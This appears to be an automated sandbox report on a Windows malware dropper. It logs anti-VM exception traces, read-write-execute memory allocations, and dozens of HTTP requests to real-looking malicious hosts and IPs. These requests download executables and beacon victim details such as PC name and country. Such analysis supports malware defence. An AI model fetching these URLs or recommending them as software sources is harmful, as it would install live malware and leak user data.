__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: z7cnf_kncwqg5qs37fhaootp+0x42fd16 @ 0x173fd16 z7cnf_kncwqg5qs37fhaootp+0x3e9349 @ 0x16f9349 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 6c f4 e1 8a 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 2948288 registers.edi: 20299776 registers.eax: 2948288 registers.ebp: 2948368 registers.edx: 2130566132 registers.ebx: 32 registers.esi: 1999795243 registers.ecx: 3678273536	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: exception.instruction_r: ed e9 fd 6d 01 00 03 f0 e5 9a 5f 42 e9 7e 00 00 exception.symbol: z7cnf_kncwqg5qs37fhaootp+0x448f5d exception.instruction: in eax, dx exception.module: Z7cnF_KncwQG5qs37FHAoOtp.exe exception.exception_code: 0xc0000096 exception.offset: 4493149 exception.address: 0x1758f5d registers.esp: 2948408 registers.edi: 22569755 registers.eax: 1750617430 registers.ebp: 20299776 registers.edx: 5462102 registers.ebx: 0 registers.esi: 13 registers.ecx: 20	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: exception.instruction_r: ed e9 34 1e 00 00 c3 e9 91 d9 fc ff a0 c4 99 0e exception.symbol: z7cnf_kncwqg5qs37fhaootp+0x44b8b5 exception.instruction: in eax, dx exception.module: Z7cnF_KncwQG5qs37FHAoOtp.exe exception.exception_code: 0xc0000096 exception.offset: 4503733 exception.address: 0x175b8b5 registers.esp: 2948408 registers.edi: 22569755 registers.eax: 1447909480 registers.ebp: 20299776 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 6c ee 7e exception.symbol: jg1_1faf+0x1016 exception.instruction: mov dword ptr [eax], ecx exception.module: jg1_1faf.exe exception.exception_code: 0xc0000005 exception.offset: 4118 exception.address: 0x401016 registers.esp: 1638276 registers.edi: 0 registers.eax: 0 registers.ebp: 1638292 registers.edx: 4198400 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: srjwwlbhrcg3hgooq2d7fgcu+0x416912 @ 0x10b6912 srjwwlbhrcg3hgooq2d7fgcu+0x422ccc @ 0x10c2ccc exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 ba 25 78 8a 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 4454520 registers.edi: 13549568 registers.eax: 4454520 registers.ebp: 4454600 registers.edx: 2130566132 registers.ebx: 32 registers.esi: 1999795243 registers.ecx: 3357671424	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: exception.instruction_r: ed e9 9c 55 03 00 ce f7 18 00 00 00 09 00 00 80 exception.symbol: srjwwlbhrcg3hgooq2d7fgcu+0x40e8a9 exception.instruction: in eax, dx exception.module: sRJwwLbHRcg3hgOoQ2d7FGcu.exe exception.exception_code: 0xc0000096 exception.offset: 4253865 exception.address: 0x10ae8a9 registers.esp: 4454640 registers.edi: 16201465 registers.eax: 1750617430 registers.ebp: 13549568 registers.edx: 2130532438 registers.ebx: 0 registers.esi: 15688064 registers.ecx: 20	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: exception.instruction_r: ed e9 68 3d 00 00 c3 e9 8b 97 fe ff 53 12 21 43 exception.symbol: srjwwlbhrcg3hgooq2d7fgcu+0x45117a exception.instruction: in eax, dx exception.module: sRJwwLbHRcg3hgOoQ2d7FGcu.exe exception.exception_code: 0xc0000096 exception.offset: 4526458 exception.address: 0x10f117a registers.esp: 4454640 registers.edi: 16201465 registers.eax: 1447909480 registers.ebp: 13549568 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 15688064 registers.ecx: 10	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: proliv041+0x41ecc5 @ 0x108ecc5 proliv041+0x432527 @ 0x10a2527 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 6d e0 7c 8a 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 2488488 registers.edi: 13352960 registers.eax: 2488488 registers.ebp: 2488568 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 1999795243 registers.ecx: 4075814912	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: exception.instruction_r: ed e9 12 60 01 00 2d a4 83 e9 d5 4b 31 80 01 00 exception.symbol: proliv041+0x449f63 exception.instruction: in eax, dx exception.module: proliv041.exe exception.exception_code: 0xc0000096 exception.offset: 4497251 exception.address: 0x10b9f63 registers.esp: 2488608 registers.edi: 16008782 registers.eax: 1750617430 registers.ebp: 13352960 registers.edx: 22614 registers.ebx: 0 registers.esi: 15515389 registers.ecx: 20	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: exception.instruction_r: ed e9 b6 86 ff ff c3 e9 f0 aa ff ff d9 1d c2 14 exception.symbol: proliv041+0x44fc5f exception.instruction: in eax, dx exception.module: proliv041.exe exception.exception_code: 0xc0000096 exception.offset: 4521055 exception.address: 0x10bfc5f registers.esp: 2488608 registers.edi: 16008782 registers.eax: 1447909480 registers.ebp: 13352960 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 15515389 registers.ecx: 10	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (40 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://fouratlinks.com/stockmerchandise/zillaCPM/r4XZt5MYHpEdcdmzqr2D.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://fouratlinks.com/stockmerchandise/serious_punch_upd/HttpTwcyK3R6gQj7t7EY.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://fouratlinks.com/stockmerchandise/total_out_hand/v8hBqWuKscbjZRqNatPw.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://fouratlinks.com/Widgets/FolderShare.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://requestimedout.com/xenocrates/zoroaster
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.google.com/
suspicious_features	Connection to IP address	suspicious_request	GET http://45.133.1.107/server.txt
suspicious_features	Connection to IP address	suspicious_request	GET http://212.192.241.15/base/api/statistics.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://212.192.241.15/base/api/getData.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features	Connection to IP address	suspicious_request	GET http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://file.ekkggr3.com/lqosko/p18j/cust51.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.9.20.156/pub.php?pub=five
suspicious_features	POST method with no referer header	suspicious_request	POST http://staticimg.youtuuee.com/api/?sid=578995&key=b4a44f7ae92b9b3dfe2bcb545627cb4d
suspicious_features	GET method with no useragent header	suspicious_request	GET http://cloutingservicedb.su/campaign2/autosubplayer.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://193.56.146.36/udptest.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://193.56.146.36/udptest.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://htagzdownload.pw/SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22BumperWw%22,%22ip%22:%22%22,%22country%22:%22KR%22,%22DateTime%22:%222021-11-05%2012:47%22,%22Device%22:%22TEST22-PC%22,%22PCName%22:%22test22%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lylaShare1_folderlyla1_foldershare_goodchannel_registry_goodchannel_installrox2_BumperWw%22,%22Os%22:%22WIN7%22,%22Browser%22:%22Internet%20explorer%22%7D
suspicious_features	Connection to IP address	suspicious_request	GET http://45.133.1.182/proxies.txt
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://212.192.241.15/service/communication.php
suspicious_features	Connection to IP address	suspicious_request	GET http://186.2.171.3/seemorebty/il.php?e=jg1_1faf
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/SuperNitouDisc.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/S2S/Disc/Disc.php?ezok=folderlyla1&tesla=7
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer4Publisher.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/publisher/1/KR.json
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer2kenpachi.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_installrox2_BumperWw
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_Traffic
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/905701898806493199/905826613411864596/BumperWW.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://iplogger.org/13LYu7
suspicious_features	GET method with no useragent header	suspicious_request	GET https://iplogger.org/12AVi7
suspicious_features	GET method with no useragent header	suspicious_request	GET https://d.gogamed.com/userhome/25/any.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://f.gogamef.com/userhome/25/1bec5879a5da641fb388046719b3c83e.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://iplogger.org/1Xxky7
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_piyyyyWW
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanager
suspicious_features	GET method with no useragent header	suspicious_request	GET https://source3.boys4dayz.com/installer.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/893177342426509335/905791554113912932/uglinesses.jpg

Performs some HTTP requests (50 out of 78 events)

request	HEAD http://fouratlinks.com/installpartners/ShareFolder.exe
request	GET http://fouratlinks.com/installpartners/ShareFolder.exe
request	GET http://fouratlinks.com/stockmerchandise/zillaCPM/r4XZt5MYHpEdcdmzqr2D.exe
request	GET http://fouratlinks.com/stockmerchandise/serious_punch_upd/HttpTwcyK3R6gQj7t7EY.exe
request	GET http://fouratlinks.com/stockmerchandise/total_out_hand/v8hBqWuKscbjZRqNatPw.exe
request	GET http://fouratlinks.com/Widgets/FolderShare.exe
request	POST http://requestimedout.com/xenocrates/zoroaster
request	GET http://www.google.com/
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://45.133.1.107/server.txt
request	GET http://212.192.241.15/base/api/statistics.php
request	POST http://212.192.241.15/base/api/getData.php
request	HEAD http://45.133.1.107/download/NiceProcessX64.bmp
request	GET http://45.133.1.107/download/NiceProcessX64.bmp
request	GET http://file.ekkggr3.com/lqosko/p18j/cust51.exe
request	GET http://ip-api.com/json/
request	GET http://45.9.20.156/pub.php?pub=five
request	GET http://staticimg.youtuuee.com/api/fbtime
request	POST http://staticimg.youtuuee.com/api/?sid=578995&key=b4a44f7ae92b9b3dfe2bcb545627cb4d
request	GET http://cloutingservicedb.su/campaign2/autosubplayer.exe
request	HEAD http://193.56.146.36/udptest.exe
request	GET http://193.56.146.36/udptest.exe
request	HEAD http://www.hzradiant.com/askhelp42/askinstall42.exe
request	HEAD http://www.mrwenshen.com/askhelp59/askinstall59.exe
request	HEAD http://dataonestorage.com/search_hyperfs_204.exe
request	HEAD http://privacytoolzfor-you6000.top/downloads/toolspab2.exe
request	HEAD http://eguntong.com/pub33.exe
request	HEAD http://www.mrwenshen.com/askinstall59.exe
request	HEAD http://www.hzradiant.com/askinstall42.exe
request	GET http://privacytoolzfor-you6000.top/downloads/toolspab2.exe
request	GET http://eguntong.com/pub33.exe
request	GET http://www.mrwenshen.com/askhelp59/askinstall59.exe
request	GET http://www.mrwenshen.com/askinstall59.exe
request	GET http://www.hzradiant.com/askhelp42/askinstall42.exe
request	GET http://www.hzradiant.com/askinstall42.exe
request	GET http://dataonestorage.com/search_hyperfs_204.exe
request	GET http://htagzdownload.pw/SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22BumperWw%22,%22ip%22:%22%22,%22country%22:%22KR%22,%22DateTime%22:%222021-11-05%2012:47%22,%22Device%22:%22TEST22-PC%22,%22PCName%22:%22test22%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lylaShare1_folderlyla1_foldershare_goodchannel_registry_goodchannel_installrox2_BumperWw%22,%22Os%22:%22WIN7%22,%22Browser%22:%22Internet%20explorer%22%7D
request	GET http://45.133.1.182/proxies.txt
request	POST http://212.192.241.15/service/communication.php
request	GET http://186.2.171.3/seemorebty/il.php?e=jg1_1faf
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	GET https://connectini.net/S2S/Disc/Disc.php?ezok=folderlyla1&tesla=7
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	GET https://connectini.net/Series/publisher/1/KR.json
request	POST https://connectini.net/Series/Conumer2kenpachi.php
request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json
request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_installrox2_BumperWw
request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_Traffic
request	GET https://cdn.discordapp.com/attachments/905701898806493199/905826613411864596/BumperWW.exe

Sends data using the HTTP POST Method (7 events)

request	POST http://requestimedout.com/xenocrates/zoroaster
request	POST http://212.192.241.15/base/api/getData.php
request	POST http://staticimg.youtuuee.com/api/?sid=578995&key=b4a44f7ae92b9b3dfe2bcb545627cb4d
request	POST http://212.192.241.15/service/communication.php
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	POST https://connectini.net/Series/Conumer2kenpachi.php

Resolves a suspicious Top Level Domain (TLD) (4 events)

domain	htagzdownload.pw	description	Palau domain TLD
domain	yandex.ru	description	Russian Federation domain TLD
domain	cloutingservicedb.su	description	Soviet Union domain TLD
domain	privacytoolzfor-you6000.top	description	Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1257 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 5, 2021, 9:05 a.m.	process_identifier: 2336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 9:05 a.m.	process_identifier: 2336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 9:05 a.m.	process_identifier: 2336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 385024 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:05 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:59 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000061d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000008f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2bb1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2e2e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0002c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00161000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00162000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
